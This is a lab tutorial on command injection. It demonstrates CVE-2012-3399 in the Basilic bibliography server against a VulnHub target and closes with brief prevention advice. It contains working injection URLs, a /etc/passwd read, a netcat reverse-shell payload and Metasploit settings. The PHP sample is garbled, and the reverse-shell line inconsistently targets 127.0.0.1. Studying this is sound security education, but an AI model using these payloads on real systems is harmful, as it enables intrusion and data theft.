Refer to the following links for related downloads and pertinent information: https://www.vulnhub.com/entry/command-injection-iso-1,81/ http://www.pentesteracademy.com/course?id=12 Command injection is an attack where the Cyberattacker tries to pass malicious payloads which are improperly handled by the application and then subsequently executed on the system shell. This vulnerability leads to remote code execution on the host machine where the vulnerable application resides on. Command injection runs with the same privilege as that of the application. For example, if the vulnerable application is executed with the privilege of www-data, and if it is later exploited, then the Cyber attacker will get root privileges associated with the www-data. The main reason for command injection vulnerability is the lack of input validation and system call or system methods that are used in the source code itself. This is illustrated with a sample of vulnerable code for launching a command injection: Create a file “test.txt” and write “Command injection test” in that file and save it as “read.php.”
”); $file=$_GET[‘fileread’]; system(“cat $file”); ?>To read a file, we must send a “GET” request to the server with the parameter “fileread” in the URL as described below: http://localhost/read.php?fileread=abc.txt The output will be as follows: Command Injection testing Command injection text To exploit the command injection vulnerability in the above code, we need to send the following request to the server: http://localhost/read.php?fileread=abc.txt;id The output will be: Command Injection testing Command injection text Uid=33 (www-data) gid=33(www-data) groups=33(www-data) The attacker then executes a command with the same privilege which is the same of the application which is currently running. This is how the command injection vulnerability is then executed. There are other variants of executing “id” on the vulnerable application, and they are as follows: http://localhost/read.php?fileread=abc.txt || id http://localhost/read.php?fileread=abc.txt && id If the installed application runs with root privilege, then the command injection can execute any command on the vulnerable host machine that the root user can execute.
Lab setup required for command injection pentest:
Kali Linux (Bridged or NAT). Attacker Kali Linux IP is 192.168.1.102 Command Injection ISO (Bridged or NAT). Target IP is 192.168.1.103
Understanding the look and feel of command injection ISO:
Command injection ISO provides us the facility to login into the OS and get a close look at the vulnerable application. To do this, log in to the command injection ISO with the username as “securitytube” and password as “123321”. Checking out for port 80 on Command Injection ISO (192.168.1.103)
As seen above there are many frameworks installed for exploitation. We will be working with Basilic 1.5.14 in this article. Basilic is a bibliography server that is used for research labs. It helps in the automation and diffusion of the research publication on the internet. It also generates a web page from the publication database. This framework helps with indexing, searching and various other options. Basilic requires PHP, Apache, and MySQL for the proper installation and configuration. To download, configure and install basilic click on the below link: http://artis.imag.fr/Software/Basilic/ Now click on the basilic folder, and you will see the following screen:
Searching for an exploit on the internet we will find CVE-2012-3399 which elaborates an improper input validation by Basilic on the following URL: http://www.securityfocus.com/bid/54234/exploit The exploit URL provides the vulnerable URL that leads to the Remote Code Execution.
The exploit helps to determine that the “diff.php” file is vulnerable to input handling and it is present in the /basilica/Config directory: http://www.example.com/basilic/Config/diff.php?file=%26cat%20/etc/passwd&new=1&old=2 Due to the output encoding of SecurityFocus, it seems to be obfuscated. An actual exploit can be seen at this link: http://www.example.com/basilic/Config/diff.php?file=|cat /etc/passwd&new=1&old=2 Using the exploit mentioned above for command execution., the following screen thus appears:
We can execute a system command using a file parameter to get a reverse shell which is as follows: Start a listener on Kali root@kali#nc -lvvp 3333 Enter the command in file parameter as “diff.php?file=|nc -v 127.0.0.1 3333 -e /bin/bash&new=1&old=2”
The vulnerability of the Metasploit and Kali can now be exploited which is as follows: Searching for an exploit in exploit-db with searchsploit tool in Kali Ruby exploit gives the following screen:
If the language is ruby, then it will also be present in Metasploit which can be described as follows: Searching for an exploit in the MSF framework. root@kali# service postgresql start root@kali# service metasploit start root@kali# msfconsole msf> search basilic
The above screen shows an Arbitrary Command Execution exploit for Basilic. Now, configure and run Metasploit as shown below:
Module options RHOST 192.168.1.103 RPORT 80 TARGETURL /basilic-1.5.14/ Payload options LHOST 192.168.1.102 LPORT 4444 Finally, Exploit.
We have thus successfully exploited a command injection vulnerability in basilic and got the www-data privilege on the target.
How to prevent command injection:
The developer should implement proper input validation; special characters should not be used throughout the entire application. The system call function should not be used anywhere in the backend programming. The software application should run with least privilege.
https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=26238 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3399 http://www.securityfocus.com/bid/54234 https://www.owasp.org/index.php/Command_Injection https://www.google.com.sa/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=0ahUKEwjjq7yQirzXAhWJWhoKHSSBBWwQFggmMAA&url=http%3A%2F%2Fartis.imag.fr%2FSoftware%2FBasilic%2F&usg=AOvVaw0NVD2PvLBYzJRZyqBV9gO6
